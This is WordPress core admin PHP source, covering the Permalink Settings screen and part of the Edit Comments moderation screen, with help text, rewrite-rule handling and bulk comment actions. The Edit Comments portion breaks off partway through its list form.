@package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_options' ) ) { wp_die( __( 'Sorry, you are not allowed to manage options for this site.' ) ); } // Used in the HTML title tag. $title = __( 'Permalink Settings' ); $parent_file = 'options-general.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'Permalinks are the permanent URLs to your individual pages and blog posts, as well as your category and tag archives. A permalink is the web address used to link to your content. The URL to each post should be permanent, and never change — hence the name permalink.' ) . '</p>' . '<p>' . __( 'This screen allows you to choose your permalink structure. You can choose from common settings or create custom URL structures.' ) . '</p>' . '<p>' . __( 'You must click the Save Changes button at the bottom of the screen for new settings to take effect.' ) . '</p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'permalink-settings', 'title' => __( 'Permalink Settings' ), 'content' => '<p>' . __( 'Permalinks can contain useful information, such as the post date, title, or other elements. You can choose from any of the suggested permalink formats, or you can craft your own if you select Custom Structure.' ) . '</p>' . '<p>' . sprintf( /* translators: %s: Percent sign (%). */ __( 'If you pick an option other than Plain, your general URL path with structure tags (terms surrounded by %s) will also appear in the custom structure field and your path can be further modified there.' ), '<code>%</code>' ) . '</p>' . '<p>' . sprintf( /* translators: 1: %category%, 2: %tag% */ __( 'When you assign multiple categories or tags to a post, only one can show up in the permalink: the lowest numbered category. This applies if your custom structure includes %1$s or %2$s.' ), '<code>%category%</code>', '<code>%tag%</code>' ) . '</p>' . '<p>' . __( 'You must click the Save Changes button at the bottom of the screen for new settings to take effect.' ) . '</p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'custom-structures', 'title' => __( 'Custom Structures' ), 'content' => '<p>' . __( 'The Optional fields let you customize the “category” and “tag” base names that will appear in archive URLs. For example, the page listing all posts in the “Uncategorized” category could be <code>/topics/uncategorized</code> instead of <code>/category/uncategorized</code>.' ) . '</p>' . '<p>' . __( 'You must click the Save Changes button at the bottom of the screen for new settings to take effect.' ) . '</p>', ) ); $help_sidebar_content = '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/settings-permalinks-screen/">Documentation on Permalinks Settings</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/customize-permalinks/">Documentation on Using Permalinks</a>' ) . '</p>'; if ( $is_nginx ) { $help_sidebar_content .= '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/server/web-server/nginx/">Documentation on Nginx configuration</a>.' ) . '</p>'; } $help_sidebar_content .= '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>'; get_current_screen()->set_help_sidebar( $help_sidebar_content ); unset( $help_sidebar_content ); $home_path = get_home_path(); $iis7_permalinks = iis7_supports_permalinks(); $permalink_structure = get_option( 'permalink_structure' ); $index_php_prefix = ''; $blog_prefix = ''; if ( ! got_url_rewrite() ) { $index_php_prefix = '/index.php'; } /* * In a subdirectory configuration of multisite, the `/blog` prefix is used by * default on the main site to avoid collisions with other sites created on that * network. If the `permalink_structure` option has been changed to remove this * base prefix, WordPress core can no longer account for the possible collision. */ if ( is_multisite() && ! is_subdomain_install() && is_main_site() && str_starts_with( $permalink_structure, '/blog/' ) ) { $blog_prefix = '/blog'; } $category_base = get_option( 'category_base' ); $tag_base = get_option( 'tag_base' ); $structure_updated = false; $htaccess_update_required = false; if ( isset( $_POST['permalink_structure'] ) || isset( $_POST['category_base'] ) ) { check_admin_referer( 'update-permalink' ); if ( isset( $_POST['permalink_structure'] ) ) { if ( isset( $_POST['selection'] ) && 'custom' !== $_POST['selection'] ) { $permalink_structure = $_POST['selection']; } else { $permalink_structure = $_POST['permalink_structure']; } if ( ! empty( $permalink_structure ) ) { $permalink_structure = preg_replace( '#/+#', '/', '/' . str_replace( '#', '', $permalink_structure ) ); if ( $index_php_prefix && $blog_prefix ) { $permalink_structure = $index_php_prefix . preg_replace( '#^/?index\.php#', '', $permalink_structure ); } else { $permalink_structure = $blog_prefix . $permalink_structure; } } $permalink_structure = sanitize_option( 'permalink_structure', $permalink_structure ); $wp_rewrite->set_permalink_structure( $permalink_structure ); $structure_updated = true; } if ( isset( $_POST['category_base'] ) ) { $category_base = $_POST['category_base']; if ( ! empty( $category_base ) ) { $category_base = $blog_prefix . preg_replace( '#/+#', '/', '/' . str_replace( '#', '', $category_base ) ); } $wp_rewrite->set_category_base( $category_base ); } if ( isset( $_POST['tag_base'] ) ) { $tag_base = $_POST['tag_base']; if ( ! empty( $tag_base ) ) { $tag_base = $blog_prefix . preg_replace( '#/+#', '/', '/' . str_replace( '#', '', $tag_base ) ); } $wp_rewrite->set_tag_base( $tag_base ); } } if ( $iis7_permalinks ) { if ( ( ! file_exists( $home_path . 'web.config' ) && win_is_writable( $home_path ) ) || win_is_writable( $home_path . 'web.config' ) ) { $writable = true; } else { $writable = false; } } elseif ( $is_nginx || $is_caddy ) { $writable = false; } else { if ( ( ! file_exists( $home_path . '.htaccess' ) && is_writable( $home_path ) ) || is_writable( $home_path . '.htaccess' ) ) { $writable = true; } else { $writable = false; $existing_rules = array_filter( extract_from_markers( $home_path . '.htaccess', 'WordPress' ) ); $new_rules = array_filter( explode( "\n", $wp_rewrite->mod_rewrite_rules() ) ); $htaccess_update_required = ( $new_rules !== $existing_rules ); } } $using_index_permalinks = $wp_rewrite->using_index_permalinks(); if ( $structure_updated ) { $message = __( 'Permalink structure updated.' ); if ( ! is_multisite() && $permalink_structure && ! $using_index_permalinks ) { if ( $iis7_permalinks ) { if ( ! $writable ) { $message = sprintf( /* translators: %s: web.config */ __( 'You should update your %s file now.' ), '<code>web.config</code>' ); } else { $message = sprintf( /* translators: %s: web.config */ __( 'Permalink structure updated. Remove write access on %s file now!' ), '<code>web.config</code>' ); } } elseif ( ! $is_nginx && ! $is_caddy && $htaccess_update_required && ! $writable ) { $message = sprintf( /* translators: %s: .htaccess */ __( 'You should update your %s file now.' ), '<code>.htaccess</code>' ); } } if ( ! get_settings_errors() ) { add_settings_error( 'general', 'settings_updated', $message, 'success' ); } set_transient( 'settings_errors', get_settings_errors(), 30 ); // 30 seconds. wp_redirect( admin_url( 'options-permalink.php?settings-updated=true' ) ); exit; } flush_rewrite_rules(); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form name="form" action="options-permalink.php" method="post"> <?php wp_nonce_field( 'update-permalink' ); ?> <p> <?php printf( /* translators: %s: Documentation URL. */ __( 'WordPress offers you the ability to create a custom URL structure for your permalinks and archives. Custom URL structures can improve the aesthetics, usability, and forward-compatibility of your links. A <a href="%s">number of tags are available</a>, and here are some examples to get you started.' ), __( 'https://wordpress.org/documentation/article/customize-permalinks/' ) ); ?> </p> <?php if ( is_multisite() && ! is_subdomain_install() && is_main_site() && str_starts_with( $permalink_structure, '/blog/' ) ) { $permalink_structure = preg_replace( '|^/?blog|', '', $permalink_structure ); $category_base = preg_replace( '|^/?blog|', '', $category_base ); $tag_base = preg_replace( '|^/?blog|', '', $tag_base ); } $url_base = home_url( $blog_prefix . $index_php_prefix ); $default_structures = array( array( 'id' => 'plain', 'label' => __( 'Plain' ), 'value' => '', 'example' => home_url( '/?p=123' ), ), array( 'id' => 'day-name', 'label' => __( 'Day and name' ), 'value' => $index_php_prefix . '/%year%/%monthnum%/%day%/%postname%/', 'example' => $url_base . '/' . gmdate( 'Y/m/d' ) . '/' . _x( 'sample-post', 'sample permalink structure' ) . '/', ), array( 'id' => 'month-name', 'label' => __( 'Month and name' ), 'value' => $index_php_prefix . '/%year%/%monthnum%/%postname%/', 'example' => $url_base . '/' . gmdate( 'Y/m' ) . '/' . _x( 'sample-post', 'sample permalink structure' ) . '/', ), array( 'id' => 'numeric', 'label' => __( 'Numeric' ), 'value' => $index_php_prefix . '/' . _x( 'archives', 'sample permalink base' ) . '/%post_id%', 'example' => $url_base . '/' . _x( 'archives', 'sample permalink base' ) . '/123', ), array( 'id' => 'post-name', 'label' => __( 'Post name' ), 'value' => $index_php_prefix . '/%postname%/', 'example' => $url_base . '/' . _x( 'sample-post', 'sample permalink structure' ) . '/', ), ); $default_structure_values = wp_list_pluck( $default_structures, 'value' ); $available_tags = array( /* translators: %s: Permalink structure tag. */ 'year' => __( '%s (The year of the post, four digits, for example 2004.)' ), /* translators: %s: Permalink structure tag. */ 'monthnum' => __( '%s (Month of the year, for example 05.)' ), /* translators: %s: Permalink structure tag. */ 'day' => __( '%s (Day of the month, for example 28.)' ), /* translators: %s: Permalink structure tag. */ 'hour' => __( '%s (Hour of the day, for example 15.)' ), /* translators: %s: Permalink structure tag. */ 'minute' => __( '%s (Minute of the hour, for example 43.)' ), /* translators: %s: Permalink structure tag. */ 'second' => __( '%s (Second of the minute, for example 33.)' ), /* translators: %s: Permalink structure tag. */ 'post_id' => __( '%s (The unique ID of the post, for example 423.)' ), /* translators: %s: Permalink structure tag. */ 'postname' => __( '%s (The sanitized post title (slug).)' ), /* translators: %s: Permalink structure tag. */ 'category' => __( '%s (Category slug. Nested sub-categories appear as nested directories in the URL.)' ), /* translators: %s: Permalink structure tag. */ 'author' => __( '%s (A sanitized version of the author name.)' ), ); /** * Filters the list of available permalink structure tags on the Permalinks settings page. * * @since 4.9.0 * * @param string[] $available_tags An array of key => value pairs of available permalink structure tags. */ $available_tags = apply_filters( 'available_permalink_structure_tags', $available_tags ); /* translators: %s: Permalink structure tag. */ $tag_added = __( '%s added to permalink structure' ); /* translators: %s: Permalink structure tag. */ $tag_removed = __( '%s removed from permalink structure' ); /* translators: %s: Permalink structure tag. */ $tag_already_used = __( '%s (already used in permalink structure)' ); ?> <h2 class="title"><?php _e( 'Common Settings' ); ?></h2> <p> <?php printf( /* translators: %s: %postname% */ __( 'Select the permalink structure for your website. Including the %s tag makes links easy to understand, and can help your posts rank higher in search engines.' ), '<code>%postname%</code>' ); ?> </p> <table class="form-table permalink-structure" role="presentation"> <tbody> <?php $permalink_structure_title = __( 'Permalink structure' ); ?> <tr> <th scope="row"><?php echo $permalink_structure_title; ?></th> <td> <fieldset class="structure-selection"> <legend class="screen-reader-text"><?php echo $permalink_structure_title; ?></legend> <?php foreach ( $default_structures as $input ) : ?> <div class="row"> <input id="permalink-input-<?php echo esc_attr( $input['id'] ); ?>" name="selection" aria-describedby="permalink-<?php echo esc_attr( $input['id'] ); ?>" type="radio" value="<?php echo esc_attr( $input['value'] ); ?>" <?php checked( $input['value'], $permalink_structure ); ?> /> <div> <label for="permalink-input-<?php echo esc_attr( $input['id'] ); ?>"> <?php echo esc_html( $input['label'] ); ?> </label> <p> <code id="permalink-<?php echo esc_attr( $input['id'] ); ?>"> <?php echo esc_html( $input['example'] ); ?> </code> </p> </div> </div><!-- .row --> <?php endforeach; ?> <div class="row"> <input id="custom_selection" name="selection" type="radio" value="custom" <?php checked( ! in_array( $permalink_structure, $default_structure_values, true ) ); ?> /> <div> <label for="custom_selection"><?php _e( 'Custom Structure' ); ?></label> <p> <label for="permalink_structure" class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Customize permalink structure by selecting available tags' ); ?> </label> <span class="code"> <code id="permalink-custom"><?php echo esc_url( $url_base ); ?></code> <input name="permalink_structure" id="permalink_structure" type="text" value="<?php echo esc_attr( $permalink_structure ); ?>" aria-describedby="permalink-custom" class="regular-text code" /> </span> </p> <div class="available-structure-tags hide-if-no-js"> <div id="custom_selection_updated" aria-live="assertive" class="screen-reader-text"></div> <?php if ( ! empty( $available_tags ) ) : ?> <fieldset> <legend><?php _e( 'Available tags:' ); ?></legend> <ul role="list"> <?php foreach ( $available_tags as $tag => $explanation ) : ?> <li> <button type="button" class="button button-secondary" aria-label="<?php echo esc_attr( sprintf( $explanation, $tag ) ); ?>" data-added="<?php echo esc_attr( sprintf( $tag_added, $tag ) ); ?>" data-removed="<?php echo esc_attr( sprintf( $tag_removed, $tag ) ); ?>" data-used="<?php echo esc_attr( sprintf( $tag_already_used, $tag ) ); ?>"> <?php echo '%' . esc_html( $tag ) . '%'; ?> </button> </li> <?php endforeach; ?> </ul> </fieldset> <?php endif; ?> </div><!-- .available-structure-tags --> </div> </div><!-- .row --> </fieldset><!-- .structure-selection --> </td> </tr> </tbody> </table> <h2 class="title"><?php _e( 'Optional' ); ?></h2> <p class="permalink-structure-optional-description"> <?php printf( /* translators: %s: Placeholder that must come at the start of the URL. */ __( 'If you like, you may enter custom structures for your category and tag URLs here. For example, using <code>topics</code> as your category base would make your category links like <code>%s/topics/uncategorized/</code>. If you leave these blank the defaults will be used.' ), $url_base ); ?> </p> <table class="form-table" role="presentation"> <tr> <th> <label for="category_base"> <?php /* translators: Prefix for category permalinks. */ _e( 'Category base' ); ?> </label> </th> <td> <?php if ( '' === $blog_prefix ) : ?> <input name="category_base" id="category_base" type="text" value="<?php echo esc_attr( $category_base ); ?>" class="regular-text code" /> <?php else : ?> <span class="code permalink-structure-has-blog-prefix"> <code class="no-break"><?php echo $blog_prefix; ?></code> <input name="category_base" id="category_base" type="text" value="<?php echo esc_attr( $category_base ); ?>" class="regular-text code" /> </span> <?php endif; ?> </td> </tr> <tr> <th> <label for="tag_base"><?php _e( 'Tag base' ); ?></label> </th> <td> <?php if ( '' === $blog_prefix ) : ?> <input name="tag_base" id="tag_base" type="text" value="<?php echo esc_attr( $tag_base ); ?>" class="regular-text code" /> <?php else : ?> <span class="code permalink-structure-has-blog-prefix"> <code class="no-break"><?php echo $blog_prefix; ?></code> <input name="tag_base" id="tag_base" type="text" value="<?php echo esc_attr( $tag_base ); ?>" class="regular-text code" /> </span> <?php endif; ?> </td> </tr> <?php do_settings_fields( 'permalink', 'optional' ); ?> </table> <?php do_settings_sections( 'permalink' ); ?> <?php submit_button(); ?> </form> <?php if ( ! is_multisite() ) : ?> <?php if ( $iis7_permalinks ) : if ( isset( $_POST['submit'] ) && $permalink_structure && ! $using_index_permalinks && ! $writable ) : if ( file_exists( $home_path . 'web.config' ) ) : ?> <p id="iis-description-a"> <?php printf( /* translators: 1: web.config, 2: Documentation URL, 3: Ctrl + A, 4: ⌘ + A, 5: Element code. */ __( '<strong>Error:</strong> Your %1$s file is not <a href="%2$s">writable</a>, so updating it automatically was not possible. This is the URL rewrite rule you should have in your %1$s file. Click in the field and press %3$s (or %4$s on Mac) to select all. Then insert this rule inside of the %5$s element in %1$s file.' ), '<code>web.config</code>', __( 'https://developer.wordpress.org/advanced-administration/server/file-permissions/' ), '<kbd>Ctrl + A</kbd>', '<kbd>⌘ + A</kbd>', '<code>/<configuration>/<system.webServer>/<rewrite>/<rules></code>' ); ?> </p> <form action="options-permalink.php" method="post"> <?php wp_nonce_field( 'update-permalink' ); ?> <p> <label for="rules"><?php _e( 'Rewrite rules:' ); ?></label><br /> <textarea rows="9" class="large-text readonly" name="rules" id="rules" readonly="readonly" aria-describedby="iis-description-a" ><?php echo esc_textarea( $wp_rewrite->iis7_url_rewrite_rules() ); ?></textarea> </p> </form> <p> <?php printf( /* translators: %s: web.config */ __( 'If you temporarily make your %s file writable to generate rewrite rules automatically, do not forget to revert the permissions after the rule has been saved.' ), '<code>web.config</code>' ); ?> </p> <?php else : ?> <p id="iis-description-b"> <?php printf( /* translators: 1: Documentation URL, 2: web.config, 3: Ctrl + A, 4: ⌘ + A */ __( '<strong>Error:</strong> The root directory of your site is not <a href="%1$s">writable</a>, so creating a file automatically was not possible. This is the URL rewrite rule you should have in your %2$s file. Create a new file called %2$s in the root directory of your site. Click in the field and press %3$s (or %4$s on Mac) to select all. Then insert this code into the %2$s file.' ), __( 'https://developer.wordpress.org/advanced-administration/server/file-permissions/' ), '<code>web.config</code>', '<kbd>Ctrl + A</kbd>', '<kbd>⌘ + A</kbd>' ); ?> </p> <form action="options-permalink.php" method="post"> <?php wp_nonce_field( 'update-permalink' ); ?> <p> <label for="rules"><?php _e( 'Rewrite rules:' ); ?></label><br /> <textarea rows="18" class="large-text readonly" name="rules" id="rules" readonly="readonly" aria-describedby="iis-description-b" ><?php echo esc_textarea( $wp_rewrite->iis7_url_rewrite_rules( true ) ); ?></textarea> </p> </form> <p> <?php printf( /* translators: %s: web.config */ __( 'If you temporarily make your site’s root directory writable to generate the %s file automatically, do not forget to revert the permissions after the file has been created.' ), '<code>web.config</code>' ); ?> </p> <?php endif; // End if 'web.config' exists. ?> <?php endif; // End if $_POST['submit'] && ! $writable. ?> <?php else : ?> <?php if ( $permalink_structure && ! $using_index_permalinks && ! $writable && $htaccess_update_required ) : ?> <p id="htaccess-description"> <?php printf( /* translators: 1: .htaccess, 2: Documentation URL, 3: Ctrl + A, 4: ⌘ + A */ __( '<strong>Error:</strong> Your %1$s file is not <a href="%2$s">writable</a>, so updating it automatically was not possible. These are the mod_rewrite rules you should have in your %1$s file. Click in the field and press %3$s (or %4$s on Mac) to select all.' ), '<code>.htaccess</code>', __( 'https://developer.wordpress.org/advanced-administration/server/file-permissions/' ), '<kbd>Ctrl + A</kbd>', '<kbd>⌘ + A</kbd>' ); ?> </p> <form action="options-permalink.php" method="post"> <?php wp_nonce_field( 'update-permalink' ); ?> <p> <label for="rules"><?php _e( 'Rewrite rules:' ); ?></label><br /> <textarea rows="8" class="large-text readonly" name="rules" id="rules" readonly="readonly" aria-describedby="htaccess-description" ><?php echo esc_textarea( $wp_rewrite->mod_rewrite_rules() ); ?></textarea> </p> </form> <?php endif; // End if ! $writable && $htaccess_update_required. ?> <?php endif; // End if $iis7_permalinks. ?> <?php endif; // End if ! is_multisite(). ?> </div><!-- .wrap --> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * Edit Comments Administration Screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'edit_posts' ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to edit comments.' ) . '</p>', 403 ); } $wp_list_table = _get_list_table( 'WP_Comments_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); $doaction = $wp_list_table->current_action(); if ( $doaction ) { check_admin_referer( 'bulk-comments' ); if ( 'delete_all' === $doaction && ! empty( $_REQUEST['pagegen_timestamp'] ) ) { /** * @global wpdb $wpdb WordPress database abstraction object. */ global $wpdb; $comment_status = wp_unslash( $_REQUEST['comment_status'] ); $delete_time = wp_unslash( $_REQUEST['pagegen_timestamp'] ); $comment_ids = $wpdb->get_col( $wpdb->prepare( "SELECT comment_ID FROM $wpdb->comments WHERE comment_approved = %s AND %s > comment_date_gmt", $comment_status, $delete_time ) ); $doaction = 'delete'; } elseif ( isset( $_REQUEST['delete_comments'] ) ) { $comment_ids = $_REQUEST['delete_comments']; $doaction = $_REQUEST['action']; } elseif ( isset( $_REQUEST['ids'] ) ) { $comment_ids = array_map( 'absint', explode( ',', $_REQUEST['ids'] ) ); } elseif ( wp_get_referer() ) { wp_safe_redirect( wp_get_referer() ); exit; } $approved = 0; $unapproved = 0; $spammed = 0; $unspammed = 0; $trashed = 0; $untrashed = 0; $deleted = 0; $redirect_to = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'spammed', 'unspammed', 'approved', 'unapproved', 'ids', ), wp_get_referer() ); $redirect_to = add_query_arg( 'paged', $pagenum, $redirect_to ); wp_defer_comment_counting( true ); foreach ( $comment_ids as $comment_id ) { // Check the permissions on each. if ( ! current_user_can( 'edit_comment', $comment_id ) ) { continue; } switch ( $doaction ) { case 'approve': wp_set_comment_status( $comment_id, 'approve' ); ++$approved; break; case 'unapprove': wp_set_comment_status( $comment_id, 'hold' ); ++$unapproved; break; case 'spam': wp_spam_comment( $comment_id ); ++$spammed; break; case 'unspam': wp_unspam_comment( $comment_id ); ++$unspammed; break; case 'trash': wp_trash_comment( $comment_id ); ++$trashed; break; case 'untrash': wp_untrash_comment( $comment_id ); ++$untrashed; break; case 'delete': wp_delete_comment( $comment_id ); ++$deleted; break; } } if ( ! in_array( $doaction, array( 'approve', 'unapprove', 'spam', 'unspam', 'trash', 'delete' ), true ) ) { $screen = get_current_screen()->id; /** This action is documented in wp-admin/edit.php */ $redirect_to = apply_filters( "handle_bulk_actions-{$screen}", $redirect_to, $doaction, $comment_ids ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } wp_defer_comment_counting( false ); if ( $approved ) { $redirect_to = add_query_arg( 'approved', $approved, $redirect_to ); } if ( $unapproved ) { $redirect_to = add_query_arg( 'unapproved', $unapproved, $redirect_to ); } if ( $spammed ) { $redirect_to = add_query_arg( 'spammed', $spammed, $redirect_to ); } if ( $unspammed ) { $redirect_to = add_query_arg( 'unspammed', $unspammed, $redirect_to ); } if ( $trashed ) { $redirect_to = add_query_arg( 'trashed', $trashed, $redirect_to ); } if ( $untrashed ) { $redirect_to = add_query_arg( 'untrashed', $untrashed, $redirect_to ); } if ( $deleted ) { $redirect_to = add_query_arg( 'deleted', $deleted, $redirect_to ); } if ( $trashed || $spammed ) { $redirect_to = add_query_arg( 'ids', implode( ',', $comment_ids ), $redirect_to ); } wp_safe_redirect( $redirect_to ); exit; } elseif ( ! empty( $_GET['_wp_http_referer'] ) ) { wp_redirect( remove_query_arg( array( '_wp_http_referer', '_wpnonce' ), wp_unslash( $_SERVER['REQUEST_URI'] ) ) ); exit; } $wp_list_table->prepare_items(); wp_enqueue_script( 'admin-comments' ); enqueue_comment_hotkeys_js(); /** * @global int $post_id */ global $post_id; if ( $post_id ) { $comments_count = wp_count_comments( $post_id ); $draft_or_post_title = wp_html_excerpt( _draft_or_post_title( $post_id ), 50, '…' ); if ( $comments_count->moderated > 0 ) { // Used in the HTML title tag. $title = sprintf( /* translators: 1: Comments count, 2: Post title. */ __( 'Comments (%1$s) on “%2$s”' ), number_format_i18n( $comments_count->moderated ), $draft_or_post_title ); } else { // Used in the HTML title tag. $title = sprintf( /* translators: %s: Post title. */ __( 'Comments on “%s”' ), $draft_or_post_title ); } } else { $comments_count = wp_count_comments(); if ( $comments_count->moderated > 0 ) { // Used in the HTML title tag. $title = sprintf( /* translators: %s: Comments count. */ __( 'Comments (%s)' ), number_format_i18n( $comments_count->moderated ) ); } else { // Used in the HTML title tag. $title = __( 'Comments' ); } } add_screen_option( 'per_page' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'You can manage comments made on your site similar to the way you manage posts and other content. This screen is customizable in the same ways as other management screens, and you can act on comments using the on-hover action links or the bulk actions.' ) . '</p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'moderating-comments', 'title' => __( 'Moderating Comments' ), 'content' => '<p>' . __( 'A red bar on the left means the comment is waiting for you to moderate it.' ) . '</p>' . '<p>' . __( 'In the <strong>Author</strong> column, in addition to the author’s name, email address, and site URL, the commenter’s IP address is shown. Clicking on this link will show you all the comments made from this IP address.' ) . '</p>' . '<p>' . __( 'In the <strong>Comment</strong> column, hovering over any comment gives you options to approve, reply (and approve), quick edit, edit, spam mark, or trash that comment.' ) . '</p>' . '<p>' . __( 'In the <strong>In response to</strong> column, there are three elements. The text is the name of the post that inspired the comment, and links to the post editor for that entry. The View Post link leads to that post on your live site. The small bubble with the number in it shows the number of approved comments that post has received. If there are pending comments, a red notification circle with the number of pending comments is displayed. Clicking the notification circle will filter the comments screen to show only pending comments on that post.' ) . '</p>' . '<p>' . __( 'In the <strong>Submitted on</strong> column, the date and time the comment was left on your site appears. Clicking on the date/time link will take you to that comment on your live site.' ) . '</p>' . '<p>' . __( 'Many people take advantage of keyboard shortcuts to moderate their comments more quickly. Use the link to the side to learn more.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/comments-screen/">Documentation on Comments</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/understand-comment-spam/">Documentation on Comment Spam</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/keyboard-shortcuts-classic-editor/#keyboard-shortcuts-for-comments">Documentation on Keyboard Shortcuts</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter comments list' ), 'heading_pagination' => __( 'Comments list navigation' ), 'heading_list' => __( 'Comments list' ), ) ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 class="wp-heading-inline"> <?php if ( $post_id ) { printf( /* translators: %s: Link to post. */ __( 'Comments on “%s”' ), sprintf( '<a href="%1$s">%2$s</a>', get_edit_post_link( $post_id ), wp_html_excerpt( _draft_or_post_title( $post_id ), 50, '…' ) ) ); } else { _e( 'Comments' ); } ?> </h1> <?php if ( $post_id ) { $post_type_object = get_post_type_object( get_post_type( $post_id ) ); if ( $post_type_object ) { printf( '<a href="%1$s" class="comments-view-item-link">%2$s</a>', get_permalink( $post_id ), $post_type_object->labels->view_item ); } } if ( isset( $_REQUEST['s'] ) && strlen( $_REQUEST['s'] ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( wp_unslash( $_REQUEST['s'] ) ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php if ( isset( $_REQUEST['error'] ) ) { $error = (int) $_REQUEST['error']; $error_msg = ''; switch ( $error ) { case 1: $error_msg = __( 'Invalid comment ID.' ); break; case 2: $error_msg = __( 'Sorry, you are not allowed to edit comments on this post.' ); break; } if ( $error_msg ) { wp_admin_notice( $error_msg, array( 'id' => 'moderated', 'additional_classes' => array( 'error' ), ) ); } } if ( isset( $_REQUEST['approved'] ) || isset( $_REQUEST['deleted'] ) || isset( $_REQUEST['trashed'] ) || isset( $_REQUEST['untrashed'] ) || isset( $_REQUEST['spammed'] ) || isset( $_REQUEST['unspammed'] ) || isset( $_REQUEST['same'] ) ) { $approved = (int) ( $_REQUEST['approved'] ?? 0 ); $deleted = (int) ( $_REQUEST['deleted'] ?? 0 ); $trashed = (int) ( $_REQUEST['trashed'] ?? 0 ); $untrashed = (int) ( $_REQUEST['untrashed'] ?? 0 ); $spammed = (int) ( $_REQUEST['spammed'] ?? 0 ); $unspammed = (int) ( $_REQUEST['unspammed'] ?? 0 ); $same = (int) ( $_REQUEST['same'] ?? 0 ); if ( $approved > 0 || $deleted > 0 || $trashed > 0 || $untrashed > 0 || $spammed > 0 || $unspammed > 0 || $same > 0 ) { if ( $approved > 0 ) { $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment approved.', '%s comments approved.', $approved ), $approved ); } if ( $spammed > 0 ) { $ids = $_REQUEST['ids'] ?? 0; $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment marked as spam.', '%s comments marked as spam.', $spammed ), $spammed ) . sprintf( ' <a href="%1$s">%2$s</a><br />', esc_url( wp_nonce_url( "edit-comments.php?doaction=undo&action=unspam&ids=$ids", 'bulk-comments' ) ), __( 'Undo' ) ); } if ( $unspammed > 0 ) { $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment restored from the spam.', '%s comments restored from the spam.', $unspammed ), $unspammed ); } if ( $trashed > 0 ) { $ids = $_REQUEST['ids'] ?? 0; $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment moved to the Trash.', '%s comments moved to the Trash.', $trashed ), $trashed ) . sprintf( ' <a href="%1$s">%2$s</a><br />', esc_url( wp_nonce_url( "edit-comments.php?doaction=undo&action=untrash&ids=$ids", 'bulk-comments' ) ), __( 'Undo' ) ); } if ( $untrashed > 0 ) { $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment restored from the Trash.', '%s comments restored from the Trash.', $untrashed ), $untrashed ); } if ( $deleted > 0 ) { $messages[] = sprintf( /* translators: %s: Number of comments. */ _n( '%s comment permanently deleted.', '%s comments permanently deleted.', $deleted ), $deleted ); } if ( $same > 0 ) { $comment = get_comment( $same ); if ( $comment ) { switch ( $comment->comment_approved ) { case '1': $messages[] = __( 'This comment is already approved.' ) . sprintf( ' <a href="%1$s">%2$s</a>', esc_url( admin_url( "comment.php?action=editcomment&c=$same" ) ), __( 'Edit comment' ) ); break; case 'trash': $messages[] = __( 'This comment is already in the Trash.' ) . sprintf( ' <a href="%1$s">%2$s</a>', esc_url( admin_url( 'edit-comments.php?comment_status=trash' ) ), __( 'View Trash' ) ); break; case 'spam': $messages[] = __( 'This comment is already marked as spam.' ) . sprintf( ' <a href="%1$s">%2$s</a>', esc_url( admin_url( "comment.php?action=editcomment&c=$same" ) ), __( 'Edit comment' ) ); break; } } } wp_admin_notice( implode( "<br />\n", $messages ), array( 'id' => 'moderated', 'additional_classes' => array( 'updated' ), 'dismissible' => true, ) ); } } ?> <?php $wp_list_table->views(); ?> <form id="comments-form" method="get"> <?php $wp_list_table->search_box( __( 'Search Comments' ), 'comment' ); ?> <?php if ( $post_id ) : ?> <input type="hidden" name="p" value="<?php echo esc_attr( (int) $post_id ); ?>" /> <?php endif; ?> <input type="hidden" name="comment_status" value="<?php echo esc_attr( $comment_status ); ?>" /> <input type="hidden" name="pagegen_timestamp" value="<?php echo esc_attr( current_time( 'mysql', true ) ); ?>" /> <input type="hidden" name="_total" value="<?php echo esc_attr( $wp_list_table->get_pagination_arg( 'total_items' ) ); ?>" /> <input type="hidden" name="_per_page" value="<?php echo esc_attr( $wp_list_table->get_pagination_arg( 'per_page' ) ); ?>" /> <input type="hidden" name="_page" value="<?php echo esc_attr( $wp_list_table->get_pagination_arg( 'page' ) ); ?>" /> <?php if ( isset( $_REQUEST['paged'] ) ) { ?> 